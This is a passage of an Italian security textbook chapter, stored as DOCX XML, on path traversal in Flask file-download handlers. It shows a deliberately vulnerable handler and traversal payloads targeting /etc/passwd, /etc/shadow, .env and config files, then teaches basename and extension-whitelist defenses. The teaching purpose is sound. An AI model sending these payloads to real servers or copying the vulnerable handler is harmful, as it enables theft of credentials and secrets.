          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La seconda metà è un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ponte verso il secondo anno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: un panorama rapido delle vulnerabilità che incontrerai nel mondo del lavoro ma che richiedono prerequisiti che acquisirai più avanti. L’idea non è insegnarti a difenderti da queste — è darti il vocabolario per riconoscerle quando le sentirai nominare e per non arrivare al secondo anno con la sensazione di partire da zero.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="414" w:name="path-traversal-il-problema"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="565" w:name="sec_10_1"/>
      <w:r>
        <w:t xml:space="preserve">10.1 Path Traversal: il problema</w:t>
      </w:r>
      <w:bookmarkEnd w:id="565"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Molte applicazioni web devono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">leggere file dal disco del server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in base a una richiesta dell’utente. Esempi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1152"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un sito che mostra le copertine dei libri:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/copertina?file=978-88-04-67890.jpg</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1152"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un’applicazione di fatturazione che permette il download di PDF:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/download?fattura=fattura-2025-001.pdf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1152"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un visualizzatore di documenti:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/leggi?doc=manuale.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il pattern è sempre lo stesso:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> download():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    nome_file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> request.args.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"fattura"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    percorso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"/var/www/fatture/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">nome_file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send_file(percorso)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sembra ragionevole.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa succede se l’utente passa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nome_file = "../../../etc/passwd"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il percorso costruito diventa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/fatture/../../../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Il filesystem interpreta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">..</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cartella superiore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Risolvendo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/fatture/../../../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       └── /var/www/fatture</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">           └── /var/www  (dopo ..)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">               └── /var  (dopo ..)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                   └── /  (dopo ..)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                       └── /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’applicazione restituisce all’utente il contenuto di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, che è un file di sistema con la lista degli utenti del server. Da lì si aprono gli scenari peggiori:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— gli hash delle password di sistema (se il processo ha i permessi)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../app/config.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— la chiave segreta dell’applicazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../app/.env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— credenziali del database, API key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../app/database.db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— l’intero database SQLite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Una richiesta HTTP ben formata può scaricare l’intera applicazione e i suoi segreti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questa famiglia di attacchi si chiama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in inglese</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attraversamento di percorso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), o anche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Directory Traversal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. CWE-22. Su scala OWASP rientra in A01 (Broken Access Control) della 2025.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="414"/>
    <w:bookmarkStart w:id="419" w:name="le-tre-difese-obbligatorie"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="566" w:name="sec_10_2"/>
      <w:r>
        <w:t xml:space="preserve">10.2 Le tre difese obbligatorie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="566"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La difesa contro Path Traversal è stratificata. Tre livelli, tutti necessari.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="415" w:name="difesa-1-os.path.basename"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Difesa 1 —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">os.path.basename</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il primo passaggio:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">rimuovere qualsiasi componente di percorso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dal nome del file ricevuto. La funzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">os.path.basename</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di Python restituisce solo la parte finale del path, eliminando le cartelle:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">os.path.basename(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"fattura-001.pdf"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># → "fattura-001.pdf"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">os.path.basename(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"../../etc/passwd"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># → "passwd"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">os.path.basename(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/etc/passwd"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># → "passwd"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">os.path.basename(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"documenti/personali/cv.pdf"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># → "cv.pdf"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Applicato all’esempio:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> download():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    nome_file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.path.basename(request.args.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"fattura"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    percorso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"/var/www/fatture/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">nome_file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send_file(percorso)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?fattura=../../../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">diventa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, il percorso costruito è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/fatture/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, che probabilmente non esiste → 404.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Niente esfiltrazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="415"/>
    <w:bookmarkStart w:id="416" w:name="difesa-2-whitelist-delle-estensioni"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Difesa 2 — Whitelist delle estensioni</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gli utenti dovrebbero scaricare solo PDF di fatture, non altro. Aggiungiamo un controllo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ESTENSIONI_AMMESSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">".pdf"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w: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KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> download():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    nome_file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.path.basename(request.args.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"fattura"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    estensione </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.path.splitext(nome_file)[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">].lower()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> estensione </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ESTENSIONI_AMMESSE:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        abort(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">403</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    percorso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"/var/www/fatture/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
